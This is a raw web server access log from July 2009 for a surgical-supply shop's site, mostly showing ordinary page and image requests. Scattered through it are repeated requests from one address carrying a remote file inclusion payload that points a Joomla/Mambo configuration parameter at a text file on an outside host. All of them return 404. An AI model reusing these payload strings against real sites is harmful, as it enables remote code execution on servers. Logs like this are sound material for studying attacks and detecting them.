88.246.245.86 - - [28/Jul/2009:03:11:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:11:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
209.59.12.99 - - [28/Jul/2009:03:11:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.128.217.133 - - [28/Jul/2009:03:12:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:13 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:13 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
74.55.30.194 - - [28/Jul/2009:03:12:29 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:12:29 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:12:29 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:12:35 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:12:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:12:35 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.128.217.133 - - [28/Jul/2009:03:12:39 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:43 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:43 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:43 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:43 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:44 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:44 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:44 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:46 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:46 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:46 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:47 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:47 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:48 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:48 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:48 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:48 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:49 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.128.217.133 - - [28/Jul/2009:03:12:53 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
74.55.30.194 - - [28/Jul/2009:03:13:01 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:07 -0400] "GET /logs/access_log.Q109070800%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:17 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:17 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:17 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:20 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:21 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:21 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:21 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:25 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:29 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:13:30 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.246.245.86 - - [28/Jul/2009:03:13:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 50279 "http://www.acesurgical.com/caso4.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:35 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:36 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:38 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:39 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:39 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:40 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:40 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:41 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:45 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
